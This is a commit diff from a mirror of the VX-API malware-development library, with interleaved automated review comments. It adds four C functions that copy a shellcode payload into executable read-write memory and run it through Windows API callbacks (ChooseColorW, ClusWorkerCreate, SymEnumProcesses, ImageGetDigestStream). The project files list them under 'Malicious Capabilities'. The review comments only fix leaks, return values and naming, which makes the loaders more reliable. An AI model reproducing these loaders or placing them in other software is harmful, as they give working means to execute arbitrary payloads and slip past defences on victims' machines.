mirror of https://github.com/vxunderground/VX-API
parent
e071f6603f
commit
83099c6721
58
README.md
58
README.md
|
@ -173,33 +173,37 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfGetLsaPidFromServiceManager | modexp | Malcode |
|
||||
| MpfGetLsaPidFromRegistry | modexp | Malcode |
|
||||
| MpfGetLsaPidFromNamedPipe | modexp | Malcode |
|
||||
| MpfSceViaEnumChildWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCDefFolderMenu_Create2 | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCertEnumSystemStore | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCertEnumSystemStoreLocation | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDateFormatsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDesktopWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDesktopsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDirTreeW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDisplayMonitors | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumFontFamiliesExW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumFontsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumLanguageGroupLocalesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumObjects | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumResourceTypesExW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemCodePagesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemGeoID | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemLanguageGroupsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemLocalesEx | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumThreadWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumTimeFormatsEx | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumUILanguagesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumWindowStationsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumerateLoadedModules64 | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaK32EnumPageFilesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumPwrSchemes | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaMessageBoxIndirectW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumChildWindows | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaCDefFolderMenu_Create2 | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaCertEnumSystemStore | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaCertEnumSystemStoreLocation | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumDateFormatsW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumDesktopWindows | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumDesktopsW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumDirTreeW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumDisplayMonitors | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumFontFamiliesExW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumFontsW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumLanguageGroupLocalesW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumObjects | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumResourceTypesExW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumSystemCodePagesW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumSystemGeoID | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumSystemLanguageGroupsW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumSystemLocalesEx | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumThreadWindows | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumTimeFormatsEx | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumUILanguagesW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumWindowStationsW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumWindows | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumerateLoadedModules64 | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaK32EnumPageFilesW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumPwrSchemes | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaMessageBoxIndirectW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaChooseColorW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaClusWorkerCreate | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaSymEnumProcesses | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaImageGetDigestStream | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
|
||||
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |
|
||||
|
|
|
@ -2,23 +2,20 @@
|
|||
|
||||
INT main(VOID)
|
||||
{
|
||||
PCHAR Buffer = NULL;
|
||||
/*
|
||||
|
||||
This is stuff I was debugging.
|
||||
------------------------------------
|
||||
|
||||
DWORD dwSize = 0;
|
||||
HMODULE hMod = NULL;
|
||||
BYTE CompressedBuffer[512] = { 0 };
|
||||
ULONG Size = 512;
|
||||
ULONG Out = 0;
|
||||
PCHAR Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
|
||||
|
||||
BYTE DecompressedBuffer[512] = { 0 };
|
||||
MpfSceViaImageGetDigestStream((PBYTE)Buffer, dwSize);
|
||||
|
||||
------------------------------------
|
||||
*/
|
||||
|
||||
Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
|
||||
|
||||
Out = LzStandardCompressBuffer((PBYTE)Buffer, dwSize, CompressedBuffer, Size);
|
||||
|
||||
Out = LzStandardDecompressBuffer(CompressedBuffer, Out, DecompressedBuffer, Size);
|
||||
|
||||
if (Buffer)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);
|
||||
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
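Review bot: As rendered, the only declarations of `dwSize`, `CompressedBuffer`, `Size`, `Out` and `DecompressedBuffer` sit inside the `/* ... */` debugging block, yet the live statements `Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);` and the two `Out = LzStandard...Buffer(...)` calls use them; if the comment delimiters are on the new side, this `main` cannot compile and those declarations need to move out next to `PCHAR Buffer = NULL;` (which of these lines are added versus context cannot be told from the rendered view). The results of `LzStandardCompressBuffer` and `LzStandardDecompressBuffer` are stored in `Out` but never checked, so a failed compression feeds its error value straight into the decompress call; a guard of the form `if (Out == 0) goto cleanup;` (whatever the helper's failure value is — not visible here) would keep the test honest. `HeapFree` documents only `HEAP_NO_SERIALIZE` as a flag, so `HEAP_ZERO_MEMORY` in the free call is meaningless and should be `0`.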
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeChooseColorWCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
CHOOSECOLORW Color = { 0 };
|
||||
Color.lStructSize = sizeof(CHOOSECOLORW);
|
||||
Color.Flags = CC_ENABLEHOOK;
|
||||
Color.lpfnHook = (LPCCHOOKPROC)lpParameter;
|
||||
|
||||
ChooseColorW(&Color);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaChooseColorW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeChooseColorWCallbackRoutine, BinAddress, INFINITE);
|
||||
}
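Review bot: `MpfSceViaChooseColorW` is declared `BOOL` but control falls off the end after `CreateThreadAndWaitForCompletion(...)`; the three sibling loaders in this commit end with `return TRUE;`, and MSVC reports the missing return as C4716, which is an error by default. Add `return TRUE;` after the wait (and release the buffer first, see the note on the ClusWorkerCreate file). `ChooseColorW(&Color);` discards its result, so a dialog that fails to initialise is silent; either check it or cast it to `(void)` with a comment saying the result is intentionally ignored. In all four new files the `VOID Invoke...CallbackRoutine(LPVOID)` helper is cast to `LPTHREAD_START_ROUTINE`; declaring it `DWORD WINAPI Invoke...CallbackRoutine(LPVOID lpParameter)` and ending with `return 0;` removes the return-type and calling-convention mismatch the cast hides.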
|
|
@ -0,0 +1,27 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeClusWorkerCreateCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
CLUS_WORKER Worker = { 0 };
|
||||
|
||||
if (ClusWorkerCreate(&Worker, (PWORKER_START_ROUTINE)lpParameter, NULL) == ERROR_SUCCESS)
|
||||
{
|
||||
ClusWorkerTerminateEx(&Worker, INFINITE, TRUE);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
BOOL MpfSceViaClusWorkerCreate(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeClusWorkerCreateCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
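Review bot: `BinAddress` is committed with `VirtualAlloc` and never released; once `CreateThreadAndWaitForCompletion` returns the buffer is no longer referenced, so `VirtualFree(BinAddress, 0, MEM_RELEASE);` belongs before `return TRUE;`, and the same leak exists in the ChooseColorW, SymEnumProcesses and ImageGetDigestStream loaders of this commit. The copy lands in a `PAGE_EXECUTE_READWRITE` private region that a thread then starts into via a non-image callback; a header comment stating that this is the observable the sample is expected to trigger in memory scanners and EDR telemetry would help readers of this corpus understand what each test exercises. `ClusWorkerTerminateEx`'s result is ignored; a comment such as `// best-effort: the worker has already run to completion, result not needed` makes that intentional rather than an oversight.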
|
|
@ -0,0 +1,37 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
|
||||
|
||||
VOID InvokeImageGetDigestStreamCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
WCHAR DefaultBinaryPath[MAX_PATH * sizeof(WCHAR)] = L"C:\\Windows\\System32\\ntdll.dll";
|
||||
HANDLE hImage = NULL;
|
||||
HANDLE hDispose = NULL;
|
||||
|
||||
hImage = CreateFileW(DefaultBinaryPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
if (hImage == INVALID_HANDLE_VALUE)
|
||||
return;
|
||||
|
||||
ImageGetDigestStream(hImage, CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO, (DIGEST_FUNCTION)lpParameter, &hDispose);
|
||||
|
||||
if(hDispose)
|
||||
CloseHandle(hDispose);
|
||||
|
||||
if(hImage)
|
||||
CloseHandle(hImage);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaImageGetDigestStream(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeImageGetDigestStreamCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
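Review bot: `WCHAR DefaultBinaryPath[MAX_PATH * sizeof(WCHAR)]` sizes an array of WCHAR in bytes, so it is twice as large as intended; `WCHAR DefaultBinaryPath[MAX_PATH] = L"C:\\Windows\\System32\\ntdll.dll";` is the correct declaration and nothing else changes. The hard-coded `C:\\` prefix assumes the system drive; building the path from `GetSystemDirectoryW` would make the test host-independent. `hDispose` is treated as an output handle, but as far as I can tell the last `ImageGetDigestStream` parameter (`DIGEST_HANDLE`) is an opaque caller context handed by value to the digest callback rather than something the API fills in, so the `CloseHandle(hDispose)` branch is dead (`hDispose` stays NULL) and the `if (hImage)` test after the `INVALID_HANDLE_VALUE` check is redundant; the return value of `ImageGetDigestStream` itself is what should be checked before the cleanup.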
|
|
@ -0,0 +1,30 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeSymEnumProcessesCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
if (!SymInitializeW(GetCurrentProcess(), NULL, FALSE))
|
||||
return;
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 6387)
|
||||
SymEnumProcesses((PSYM_ENUMPROCESSES_CALLBACK)lpParameter, NULL);
|
||||
#pragma warning( pop )
|
||||
|
||||
SymCleanup(GetCurrentProcess());
|
||||
|
||||
}
|
||||
|
||||
BOOL MpfSceViaSymEnumProcesses(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeSymEnumProcessesCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
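Review bot: `#pragma warning(disable : 6387)` silences the analyzer around `SymEnumProcesses(..., NULL)` without recording why the NULL context is acceptable; a one-line comment such as `// UserContext is not consumed by the callback; NULL is permitted` documents the suppression, and the result of `SymEnumProcesses` is discarded, so an enumeration that fails before calling back leaves no trace. If I recall the dbghelp contract correctly, `SymInitializeW` on `GetCurrentProcess()` fails when symbols are already initialised for the process, so the early `return;` silently skips the test whenever the harness already holds a dbghelp session; that is worth a comment above the check. The blank line before the closing brace can go.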
|
|
@ -266,6 +266,8 @@
|
|||
<ClCompile Include="MpfSceViaCertEnumSystemStore.cpp" />
|
||||
<ClCompile Include="MpfSceViaCertEnumSystemStoreLocation.cpp" />
|
||||
<ClCompile Include="MpfSceViaCertFindChainInStore.cpp" />
|
||||
<ClCompile Include="MpfSceViaChooseColor.cpp" />
|
||||
<ClCompile Include="MpfSceViaClusWorkerCreate.cpp" />
|
||||
<ClCompile Include="MpfSceViaCreateThreadpoolWait.cpp" />
|
||||
<ClCompile Include="MpfSceViaCreateTimerQueueTimer.cpp" />
|
||||
<ClCompile Include="MpfSceViaCryptEnumOIDInfo.cpp" />
|
||||
|
@ -295,10 +297,12 @@
|
|||
<ClCompile Include="MpfSceViaEnumWindowStationsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEvtSubscribe.cpp" />
|
||||
<ClCompile Include="MpfSceViaFlsAlloc.cpp" />
|
||||
<ClCompile Include="MpfSceViaImageGetDigestStream.cpp" />
|
||||
<ClCompile Include="MpfSceViaImmEnumInputContext.cpp" />
|
||||
<ClCompile Include="MpfSceViaInitOnceExecuteOnce.cpp" />
|
||||
<ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp" />
|
||||
<ClCompile Include="MpfSceViaSymEnumProcesses.cpp" />
|
||||
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
|
||||
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
|
||||
<ClCompile Include="ReadDataFromPeSection.cpp" />
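Review bot: The new source is registered as `MpfSceViaChooseColor.cpp` while the function it defines and its prototype in Win32Helper.h are named `MpfSceViaChooseColorW`; every other entry here names the file after its function (`MpfSceViaEnumWindowStationsW.cpp`, `MpfSceViaK32EnumPageFilesW.cpp`), so `<ClCompile Include="MpfSceViaChooseColorW.cpp" />` — with the matching rename of the file and of the entry in the .vcxproj.filters hunk — keeps the convention. The other three new entries match their functions.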
|
||||
|
|
|
@ -741,6 +741,18 @@
|
|||
<ClCompile Include="XpressHuffMaximumDecompressBuffer.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\Compression\Xpress Huff</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaChooseColor.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaClusWorkerCreate.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaSymEnumProcesses.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaImageGetDigestStream.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -3,7 +3,8 @@
|
|||
#include "StringManipulation.h"
|
||||
#include "FunctionDeclaration.h"
|
||||
#include <Ws2tcpip.h>
|
||||
#include <Dbghelp.h>
|
||||
#include <imagehlp.h>
|
||||
//#include <Dbghelp.h>
|
||||
#include <wincrypt.h>
|
||||
#include <shlwapi.h>
|
||||
#include <Shlobj.h>
|
||||
|
@ -19,12 +20,15 @@
|
|||
#include <imm.h>
|
||||
#include <dpa_dsa.h>
|
||||
#include <winevt.h>
|
||||
#include <resapi.h>
|
||||
|
||||
|
||||
|
||||
#pragma comment(lib, "Dnsapi.lib")
|
||||
#pragma comment(lib, "Iphlpapi.lib")
|
||||
#pragma comment(lib, "Crypt32.lib")
|
||||
#pragma comment(lib, "Dbghelp.lib")
|
||||
#pragma comment(lib, "Imagehlp.lib")
|
||||
//#pragma comment(lib, "Dbghelp.lib")
|
||||
#pragma comment(lib, "Wtsapi32.lib")
|
||||
#pragma comment(lib, "Urlmon.lib")
|
||||
#pragma comment(lib, "PowrProf.lib")
|
||||
|
@ -32,6 +36,8 @@
|
|||
#pragma comment(lib, "Imm32.lib")
|
||||
#pragma comment(lib, "Comctl32.lib")
|
||||
#pragma comment(lib, "Wevtapi.lib")
|
||||
#pragma comment(lib, "ResUtils.lib")
|
||||
|
||||
|
||||
|
||||
#ifndef NT_SUCCESS
|
||||
|
@ -312,6 +318,11 @@ BOOL MpfSceViaCreateTimerQueueTimer(_In_ PBYTE Payload, _In_ DWORD PayloadSizeIn
|
|||
BOOL MpfSceViaEvtSubscribe(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, some shellcode crashes application, requires improved testing
|
||||
BOOL MpfSceViaFlsAlloc(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaInitOnceExecuteOnce(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaChooseColorW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaClusWorkerCreate(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaSymEnumProcesses(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaImageGetDigestStream(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
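Review bot: The first two hunks of this header each show a live line beside its commented-out twin — `#include <Dbghelp.h>` with `//#include <Dbghelp.h>`, and `#pragma comment(lib, "Dbghelp.lib")` with `//#pragma comment(lib, "Dbghelp.lib")`; whichever of each pair is on the new side, the commented-out copy is dead text and should be deleted rather than kept next to the active line. In the prototype hunk, the existing `MpfSceViaEvtSubscribe` declaration carries a stability note while the four new declarations carry none; since the ChooseColorW definition in this commit has no return statement, at minimum `BOOL MpfSceViaChooseColorW(...); // definition currently lacks a return value` would flag it for the next reader until the .cpp is fixed.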
|
||||
|
||||
|
||||
|
||||
|
||||
|
|